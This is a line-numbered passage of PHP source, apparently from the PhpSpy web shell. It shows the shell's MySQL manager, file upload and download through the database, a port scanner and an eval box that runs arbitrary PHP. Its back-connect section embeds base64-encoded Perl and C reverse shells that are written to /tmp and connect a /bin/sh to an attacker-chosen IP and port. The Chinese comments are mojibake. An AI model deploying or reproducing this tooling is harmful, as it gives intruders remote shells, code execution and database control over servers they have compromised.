 731    $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
 732    $('mysqlfile').charset.value=$('dbinfo').charset.value;
 733    $('mysqlfile').submit();
 734 }
 735 </script>
 736 <?php
 737    !$dbhost && $dbhost = 'localhost';
 738    !$dbuser && $dbuser = 'root';
 739    !$dbport && $dbport = '3306';
 740    formhead(array('title'=>'MYSQL Information','name'=>'dbinfo'));
 741    makehide('action','sqlfile');
 742    p('<p>');
 743    p('DBHost:');
 744    makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
 745    p(':');
 746    makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
 747    p('DBUser:');
 748    makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
 749    p('DBPass:');
 750    makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
 751    p('DBName:');
 752    makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname));
 753    p('DBCharset:');
 754    makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
 755    p('</p>');
 756    formfoot();
 757    p('<form action="'.$self.'" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
 758    p('<h2>Upload file</h2>');
 759    p('<p><b>This operation the DB user must has FILE privilege</b></p>');
 760    p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
 761    p('<h2>Download file</h2>');
 762    p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
 763    makehide('dbhost');
 764    makehide('dbport');
 765    makehide('dbuser');
 766    makehide('dbpass');
 767    makehide('dbname');
 768    makehide('charset');
 769    makehide('doing');
 770    makehide('action','sqlfile');
 771    p('</form>');
 772 }
 773 
 774 elseif ($action == 'mysqladmin') {
 775    !$dbhost && $dbhost = 'localhost';
 776    !$dbuser && $dbuser = 'root';
 777    !$dbport && $dbport = '3306';
 778    $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
 779    if(isset($dbhost)){
 780        $dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
 781   }
 782   if(isset($dbuser)) {
 783       $dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
 784   }
 785   if(isset($dbpass)) {
 786       $dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
 787   }
 788   if(isset($dbport)) {
 789       $dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
 790   }
 791   if(isset($dbname)) {
 792       $dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
 793   }
 794   if(isset($charset)) {
 795       $dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
 796   }
 797 
 798   if ($doing == 'backupmysql' && $saveasfile) {
 799       if (!$table) {
 800           m('Please choose the table');
 801       } else {
 802           $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 803           $fp = @fopen($path,'w');
 804           if ($fp) {
 805               foreach($table as $k => $v) {
 806                   if ($v) {
 807                       sqldumptable($v, $fp);
 808                   }
 809               }
 810               fclose($fp);                
 811               $fileurl = str_replace(SA_ROOT,'',$path);
 812               m('Database has success backup to <a href="'.$fileurl.'" target="_blank">'.$path.'</a>');
 813               mysql_close();
 814           } else {
 815               m('Backup failed');
 816           }
 817       }
 818   }
 819   if ($insert && $insertsql) {
 820       $keystr = $valstr = $tmp = '';
 821       foreach($insertsql as $key => $val) {
 822           if ($val) {
 823               $keystr .= $tmp.$key;
 824               $valstr .= $tmp."'".addslashes($val)."'";
 825               $tmp = ',';
 826           }
 827       }
 828       if ($keystr && $valstr) {
 829           $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 830           m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
 831       }
 832   }
 833   if ($update && $insertsql && $base64) {
 834       $valstr = $tmp = '';
 835       foreach($insertsql as $key => $val) {
 836           $valstr .= $tmp.$key."='".addslashes($val)."'";
 837           $tmp = ',';
 838       }
 839       if ($valstr) {
 840           $where = base64_decode($base64);
 841           $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 842           m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
 843       }
 844   }
 845   if ($doing == 'del' && $base64) {
 846       $where = base64_decode($base64);
 847       $delete_sql = "DELETE FROM $tablename WHERE $where";
 848       $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 849       m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
 850   }
 851 
 852   if ($tablename && $doing == 'drop') {
 853       $mysqllink = mydbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
 854       if (q("DROP TABLE $tablename")) {
 855           m('Drop table of success');
 856           $tablename = '';
 857       } else {
 858           m(mysql_error());
 859       }
 860   }
 861 
 862   formhead(array('title'=>'MYSQL Manager'));
 863   makehide('action','mysqladmin');
 864   p('<p>');
 865   p('DBHost:');
 866   makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost));
 867   p(':');
 868   makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport));
 869   p('DBUser:');
 870   makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser));
 871   p('DBPass:');
 872   makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass));
 873   p('DBCharset:');
 874   makeselect(array('name'=>'charset','option'=>$charsetdb,'selected'=>$charset,'nokey'=>1));
 875   makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt'));
 876   p('</p>');
 877   formfoot();
 878 
 879   //²Ù×÷¼Ç¼
 880   formhead(array('name'=>'recordlist'));
 881   makehide('doing');
 882   makehide('action','mysqladmin');
 883   makehide('base64');
 884   makehide('tablename');
 885   p($dbform);
 886   formfoot();
 887 
 888   //Ñ¡¶¨Êý¾Ý¿â
 889   formhead(array('name'=>'setdbname'));
 890   makehide('action','mysqladmin');
 891   p($dbform);
 892   if (!$dbname) {
 893       makehide('dbname');
 894   }
 895   formfoot();
 896 
 897   //Ñ¡¶¨±í
 898   formhead(array('name'=>'settable'));
 899   makehide('action','mysqladmin');
 900   p($dbform);
 901   makehide('tablename');
 902   makehide('page',$page);
 903   makehide('doing');
 904   formfoot();
 905 
 906   $cachetables = array(); 
 907   $pagenum = 30;
 908   $page = intval($page);
 909   if($page) {
 910       $start_limit = ($page - 1) * $pagenum;
 911   } else {
 912       $start_limit = 0;
 913       $page = 1;
 914   }
 915   if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
 916       $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
 917       //»ñÈ¡Êý¾Ý¿âÐÅÏ¢
 918       $mysqlver = mysql_get_server_info();
 919       p('<p>MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'</p>');
 920       $highver = $mysqlver > '4.1' ? 1 : 0;
 921 
 922       //»ñÈ¡Êý¾Ý¿â
 923       $query = q("SHOW DATABASES");
 924       $dbs = array();
 925       $dbs[] = '-- Select a database --';
 926       while($db = mysql_fetch_array($query)) {
 927           $dbs[$db['Database']] = $db['Database'];
 928       }
 929       makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1));
 930       $tabledb = array();
 931       if ($dbname) {
 932           p('<p>');
 933           p('Current dababase: <a href="javascript:moddbname(\''.$dbname.'\');">'.$dbname.'</a>');
 934            if ($tablename) {
 935                p(' | Current Table: <a href="javascript:settable(\''.$tablename.'\');">'.$tablename.'</a> [ <a href="javascript:settable(\''.$tablename.'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$tablename.'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$tablename.'\', \'drop\');">Drop</a> ]');
 936            }
 937            p('</p>');
 938            mysql_select_db($dbname);
 939 
 940            $getnumsql = '';
 941            $runquery = 0;
 942            if ($sql_query) {
 943                $runquery = 1;
 944            }
 945            $allowedit = 0;
 946            if ($tablename && !$sql_query) {
 947                $sql_query = "SELECT * FROM $tablename";
 948                $getnumsql = $sql_query;
 949                $sql_query = $sql_query." LIMIT $start_limit, $pagenum";
 950                $allowedit = 1;
 951            }
 952            p('<form action="'.$self.'" method="POST">');
 953            p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database '.$dbname.':</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">'.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
 954            makehide('tablename', $tablename);
 955            makehide('action','mysqladmin');
 956            p($dbform);
 957            p('</form>');
 958            if ($tablename || ($runquery && $sql_query)) {
 959                if ($doing == 'structure') {
 960                    $result = q("SHOW FULL COLUMNS FROM $tablename");
 961                    $rowdb = array();
 962                    while($row = mysql_fetch_array($result)) {
 963                        $rowdb[] = $row;
 964                    }
 965                    p('<h3>Structure</h3>');
 966                    p('<table border="0" cellpadding="3" cellspacing="0">');
 967                    p('<tr class="head">');
 968                    p('<td>Field</td>');
 969                    p('<td>Type</td>');
 970                    p('<td>Collation</td>');
 971                    p('<td>Null</td>');
 972                    p('<td>Key</td>');
 973                    p('<td>Default</td>');
 974                    p('<td>Extra</td>');
 975                    p('<td>Privileges</td>');
 976                    p('<td>Comment</td>');
 977                    p('</tr>');
 978                    foreach ($rowdb as $row) {
 979                        $thisbg = bg();
 980                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
 981                        p('<td>'.$row['Field'].'</td>');
 982                        p('<td>'.$row['Type'].'</td>');
 983                        p('<td>'.$row['Collation'].'&nbsp;</td>');
 984                        p('<td>'.$row['Null'].'&nbsp;</td>');
 985                        p('<td>'.$row['Key'].'&nbsp;</td>');
 986                        p('<td>'.$row['Default'].'&nbsp;</td>');
 987                        p('<td>'.$row['Extra'].'&nbsp;</td>');
 988                        p('<td>'.$row['Privileges'].'&nbsp;</td>');
 989                        p('<td>'.$row['Comment'].'&nbsp;</td>');
 990                        p('</tr>');
 991                    }
 992                    tbfoot();
 993                    $result = q("SHOW INDEX FROM $tablename");
 994                    $rowdb = array();
 995                    while($row = mysql_fetch_array($result)) {
 996                        $rowdb[] = $row;
 997                    }
 998                    p('<h3>Indexes</h3>');
 999                    p('<table border="0" cellpadding="3" cellspacing="0">');
1000                    p('<tr class="head">');
1001                    p('<td>Keyname</td>');
1002                    p('<td>Type</td>');
1003                    p('<td>Unique</td>');
1004                    p('<td>Packed</td>');
1005                    p('<td>Seq_in_index</td>');
1006                    p('<td>Field</td>');
1007                    p('<td>Cardinality</td>');
1008                    p('<td>Collation</td>');
1009                    p('<td>Null</td>');
1010                    p('<td>Comment</td>');
1011                    p('</tr>');
1012                    foreach ($rowdb as $row) {
1013                        $thisbg = bg();
1014                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1015                        p('<td>'.$row['Key_name'].'</td>');
1016                        p('<td>'.$row['Index_type'].'</td>');
1017                        p('<td>'.($row['Non_unique'] ? 'No' : 'Yes').'&nbsp;</td>');
1018                        p('<td>'.($row['Packed'] === null ? 'No' : $row['Packed']).'&nbsp;</td>');
1019                        p('<td>'.$row['Seq_in_index'].'</td>');
1020                        p('<td>'.$row['Column_name'].($row['Sub_part'] ? '('.$row['Sub_part'].')' : '').'&nbsp;</td>');
1021                        p('<td>'.($row['Cardinality'] ? $row['Cardinality'] : 0).'&nbsp;</td>');
1022                        p('<td>'.$row['Collation'].'&nbsp;</td>');
1023                        p('<td>'.$row['Null'].'&nbsp;</td>');
1024                        p('<td>'.$row['Comment'].'&nbsp;</td>');
1025                        p('</tr>');
1026                    }
1027                    tbfoot();
1028                } elseif ($doing == 'insert' || $doing == 'edit') {
1029                    $result = q('SHOW COLUMNS FROM '.$tablename);
1030                    while ($row = mysql_fetch_array($result)) {
1031                        $rowdb[] = $row;
1032                    }
1033                    $rs = array();
1034                    if ($doing == 'insert') {
1035                        p('<h2>Insert new line in '.$tablename.' table &raquo;</h2>');
1036                    } else {
1037                        p('<h2>Update record in '.$tablename.' table &raquo;</h2>');
1038                        $where = base64_decode($base64);
1039                        $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1040                        $rs = mysql_fetch_array($result);
1041                    }
1042                    p('<form method="post" action="'.$self.'">');
1043                    p($dbform);
1044                    makehide('action','mysqladmin');
1045                    makehide('tablename',$tablename);
1046                    p('<table border="0" cellpadding="3" cellspacing="0">');
1047                    foreach ($rowdb as $row) {
1048                        if ($rs[$row['Field']]) {
1049                            $value = htmlspecialchars($rs[$row['Field']]);
1050                        } else {
1051                            $value = '';
1052                        }
1053                        $thisbg = bg();
1054                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1055                        if ($row['Key'] == 'UNI' || $row['Extra'] == 'auto_increment' || $row['Key'] == 'PRI') {
1056                            p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td>'.$value.'&nbsp;</td></tr>');
1057                        } else {                           
1058                            p('<td><b>'.$row['Field'].'</b><br />'.$row['Type'].'</td><td><textarea class="area" name="insertsql['.$row['Field'].']" style="width:500px;height:60px;overflow:auto;">'.$value.'</textarea></td></tr>');
1059                        }
1060                    }
1061                    if ($doing == 'insert') {
1062                        p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1063                    } else {
1064                        p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1065                        makehide('base64', $base64);
1066                    }
1067                    p('</table></form>');
1068                } else {
1069                    $querys = @explode(';',$sql_query);
1070                    foreach($querys as $num=>$query) {
1071                        if ($query) {
1072                            p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
1073                            switch(qy($query))
1074                            {
1075                                case 0:
1076                                    p('<h2>Error : '.mysql_error().'</h2>');
1077                                    break;    
1078                                case 1:
1079                                    if (strtolower(substr($query,0,13)) == 'select * from') {
1080                                        $allowedit = 1;
1081                                    }
1082                                    if ($getnumsql) {
1083                                        $tatol = mysql_num_rows(q($getnumsql));
1084                                        $multipage = multi($tatol, $pagenum, $page, $tablename);
1085                                    }
1086                                    if (!$tablename) {
1087                                        $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1088                                        $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1089                                        preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
1090                                        $tablename = $matches[1][0];
1091                                    }
1092 
1093                                    /*********************/
1094                                    $getfield = q("SHOW COLUMNS FROM $tablename");
1095                                    $rowdb = array();
1096                                    $keyfied = ''; //Ö÷¼ü×Ö¶Î
1097                                    while($row = @mysql_fetch_assoc($getfield)) {
1098                                        $rowdb[$row['Field']]['Key'] = $row['Key'];
1099                                        $rowdb[$row['Field']]['Extra'] = $row['Extra'];
1100                                        if ($row['Key'] == 'UNI' || $row['Key'] == 'PRI') {
1101                                            $keyfied = $row['Field'];
1102                                        }
1103                                    }
1104                                    /*********************/                             
1105                                    //Ö±½Óä¯ÀÀ±í°´ÕÕÖ÷¼ü½µÐòÅÅÁÐ
1106                                    if ($keyfied && strtolower(substr($query,0,13)) == 'select * from') {
1107                                        $query = str_replace(" LIMIT ", " order by $keyfied DESC LIMIT ", $query);
1108                                    }
1109 
1110                                    $result = q($query);
1111 
1112                                    p($multipage);
1113                                    p('<table border="0" cellpadding="3" cellspacing="0">');
1114                                    p('<tr class="head">');
1115                                    if ($allowedit) p('<td>Action</td>');
1116                                    $fieldnum = @mysql_num_fields($result);
1117                                    for($i=0;$i<$fieldnum;$i++){
1118                                        $name = @mysql_field_name($result, $i);
1119                                        $type = @mysql_field_type($result, $i);
1120                                        $len = @mysql_field_len($result, $i);
1121                                        p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1122                                    }
1123                                    p('</tr>');
1124                                    
1125                                    while($mn = @mysql_fetch_assoc($result)){
1126                                        $thisbg = bg();
1127                                        p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1128                                        $where = $tmp = $b1 = '';
1129                                        //Ñ¡È¡Ìõ¼þ×Ö¶ÎÓÃ
1130                                        foreach($mn as $key=>$inside){
1131                                            if ($inside) {
1132                                                //²éÕÒÖ÷¼ü¡¢Î¨Ò»ÊôÐÔ¡¢×Ô¶¯Ôö¼ÓµÄ×ֶΣ¬ÕÒµ½¾ÍÍ£Ö¹£¬·ñÔò×éºÏËùÓÐ×Ö¶Î×÷ΪÌõ¼þ¡£
1133                                                if ($rowdb[$key]['Key'] == 'UNI' || $rowdb[$key]['Extra'] == 'auto_increment' || $rowdb[$key]['Key'] == 'PRI') {
1134                                                    $where = $key."='".addslashes($inside)."'";
1135                                                    break;
1136                                                }
1137                                                $where .= $tmp.$key."='".addslashes($inside)."'";
1138                                                $tmp = ' AND ';
1139                                            }
1140                                        }
1141                                        //¶ÁÈ¡¼Ç¼ÓÃ
1142                                        foreach($mn as $key=>$inside){
1143                                            $b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
1144                                        }
1145                                        $where = base64_encode($where);
1146 
1147                                        if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
1148 
1149                                        p($b1);
1150                                        p('</tr>');
1151                                        unset($b1);
1152                                    }
1153                                    p('<tr class="head">');
1154                                    if ($allowedit) p('<td>Action</td>');
1155                                    $fieldnum = @mysql_num_fields($result);
1156                                    for($i=0;$i<$fieldnum;$i++){
1157                                        $name = @mysql_field_name($result, $i);
1158                                        $type = @mysql_field_type($result, $i);
1159                                        $len = @mysql_field_len($result, $i);
1160                                        p("<td nowrap>$name<br><span>$type($len)".(($rowdb[$name]['Key'] == 'UNI' || $rowdb[$name]['Key'] == 'PRI') ? '<b> - PRIMARY</b>' : '').($rowdb[$name]['Extra'] == 'auto_increment' ? '<b> - Auto</b>' : '')."</span></td>");
1161                                    }
1162                                    p('</tr>');
1163                                    tbfoot();
1164                                    p($multipage);
1165                                    break;
1166                                case 2:
1167                                    $ar = mysql_affected_rows();
1168                                    p('<h2>affected rows : <b>'.$ar.'</b></h2>');
1169                                    break;
1170                            }
1171                        }
1172                    }
1173                }
1174            } else {
1175                $query = q("SHOW TABLE STATUS");
1176                $table_num = $table_rows = $data_size = 0;
1177                $tabledb = array();
1178                while($table = mysql_fetch_array($query)) {
1179                    $data_size = $data_size + $table['Data_length'];
1180                    $table_rows = $table_rows + $table['Rows'];
1181                    $table['Data_length'] = sizecount($table['Data_length']);
1182                    $table_num++;
1183                    $tabledb[] = $table;
1184                }
1185                $data_size = sizecount($data_size);
1186                unset($table);
1187                p('<table border="0" cellpadding="0" cellspacing="0">');
1188                p('<form action="'.$self.'" method="POST">');
1189                makehide('action','mysqladmin');
1190                p($dbform);
1191                p('<tr class="head">');
1192                p('<td width="2%" align="center">&nbsp;</td>');
1193                p('<td>Name</td>');
1194                p('<td>Rows</td>');
1195                p('<td>Data_length</td>');
1196                p('<td>Create_time</td>');
1197                p('<td>Update_time</td>');
1198                if ($highver) {
1199                    p('<td>Engine</td>');
1200                    p('<td>Collation</td>');
1201                }
1202                p('<td>Operate</td>');
1203                p('</tr>');
1204                foreach ($tabledb as $key => $table) {
1205                    $thisbg = bg();
1206                    p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
1207                    p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
1208                    p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a></td>');
1209                    p('<td>'.$table['Rows'].'</td>');
1210                    p('<td>'.$table['Data_length'].'</td>');
1211                    p('<td>'.$table['Create_time'].'&nbsp;</td>');
1212                    p('<td>'.$table['Update_time'].'&nbsp;</td>');
1213                    if ($highver) {
1214                        p('<td>'.$table['Engine'].'</td>');
1215                        p('<td>'.$table['Collation'].'</td>');
1216                    }
1217                    p('<td><a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a></td>');
1218                    p('</tr>');
1219                }
1220                p('<tr class="head">');
1221                p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1222                p('<td>Name</td>');
1223                p('<td>Rows</td>');
1224                p('<td>Data_length</td>');
1225                p('<td>Create_time</td>');
1226                p('<td>Update_time</td>');
1227                if ($highver) {
1228                    p('<td>Engine</td>');
1229                    p('<td>Collation</td>');
1230                }
1231                p('<td>Operate</td>');
1232                p('</tr>');
1233                p('<tr class='.bg().'>');
1234                p('<td>&nbsp;</td>');
1235                p('<td>Total tables: '.$table_num.'</td>');
1236                p('<td>'.$table_rows.'</td>');
1237                p('<td>'.$data_size.'</td>');
1238                p('<td colspan="'.($highver ? 5 : 3).'">&nbsp;</td>');
1239                p('</tr>');
1240 
1241                p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 9 : 7)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$dbname.".sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" value=\"Export selection table\" /></td></tr>");
1242                makehide('doing','backupmysql');
1243                formfoot();
1244                p("</table>");
1245                fr($query);
1246            }
1247        }
1248    }
1249    tbfoot();
1250    @mysql_close();
1251 }//end mysql
1252 
1253 elseif ($action == 'backconnect') {
1254    !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1255    !$yourport && $yourport = '12345';
1256    $usedb = array('perl'=>'perl','c'=>'c');
1257 
1258    $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
1259        "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
1260        "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
1261        "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
1262        "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
1263        "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
1264        "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1265    $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
1266        "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
1267        "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
1268        "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
1269        "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
1270        "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
1271        "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
1272        "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1273 
1274    if ($start && $yourip && $yourport && $use){
1275        if ($use == 'perl') {
1276            cf('/tmp/angel_bc',$back_connect);
1277            $res = execute(which('perl')." /tmp/angel_bc $yourip $yourport &");
1278        } else {
1279            cf('/tmp/angel_bc.c',$back_connect_c);
1280            $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1281            @unlink('/tmp/angel_bc.c');
1282            $res = execute("/tmp/angel_bc $yourip $yourport &");
1283        }
1284        m("Now script try connect to $yourip port $yourport ...");
1285    }
1286 
1287    formhead(array('title'=>'Back Connect'));
1288    makehide('action','backconnect');
1289    p('<p>');
1290    p('Your IP:');
1291    makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
1292    p('Your Port:');
1293    makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
1294    p('Use:');
1295    makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
1296    makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt'));
1297    p('</p>');
1298    formfoot();
1299 }//end
1300 
1301 elseif ($action == 'portscan') {
1302    !$scanip && $scanip = '127.0.0.1';
1303    !$scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958';
1304    formhead(array('title'=>'Port Scan'));
1305    makehide('action','portscan');
1306    p('<p>');
1307    p('IP:');
1308    makeinput(array('name'=>'scanip','size'=>20,'value'=>$scanip));
1309    p('Port:');
1310    makeinput(array('name'=>'scanport','size'=>80,'value'=>$scanport));
1311    makeinput(array('name'=>'startscan','value'=>'Scan','type'=>'submit','class'=>'bt'));
1312    p('</p>');
1313    formfoot();
1314 
1315    if ($startscan) {
1316        p('<h2>Result &raquo;</h2>');
1317        p('<ul class="info">');
1318        foreach(explode(',', $scanport) as $port) {
1319            $fp = @fsockopen($scanip, $port, &$errno, &$errstr, 1); 
1320            if (!$fp) {
1321                p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#f00;">Close</span></li>');
1322           } else {
1323                p('<li>'.$scanip.':'.$port.' ------------------------ <span style="font-weight:bold;color:#080;">Open</span></li>');
1324                @fclose($fp);
1325           } 
1326        }
1327        p('</ul>');
1328    }
1329 }
1330 
1331 elseif ($action == 'eval') {
1332    $phpcode = trim($phpcode);
1333    if($phpcode){
1334        if (!preg_match('#<\?#si', $phpcode)) {
1335            $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1336        }
1337        eval("?".">$phpcode<?");
1338    }
1339    formhead(array('title'=>'Eval PHP Code'));
1340    makehide('action','eval');
1341    maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
1342    p('<p><a href="http://w'.'ww.4ng'.'el.net/php'.'spy/pl'.'ugin/" target="_blank">Get plugins</a></p>');
1343    formfooter();
1344 }//end eval
1345 
1346 elseif ($action == 'editfile') {
1347    if(file_exists($opfile)) {
1348        $fp=@fopen($opfile,'r');
1349        $contents=@fread($fp, filesize($opfile));
1350        @fclose($fp);
1351        $contents=htmlspecialchars($contents);
1352    }
1353    formhead(array('title'=>'Create / Edit File'));
1354    makehide('action','file');
1355    makehide('dir',$nowpath);
1356    makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
1357    maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
1358    formfooter();
1359    
1360    goback();
1361 
1362 }//end editfile
1363 
1364 elseif ($action == 'newtime') {
1365    $opfilemtime = @filemtime($opfile);
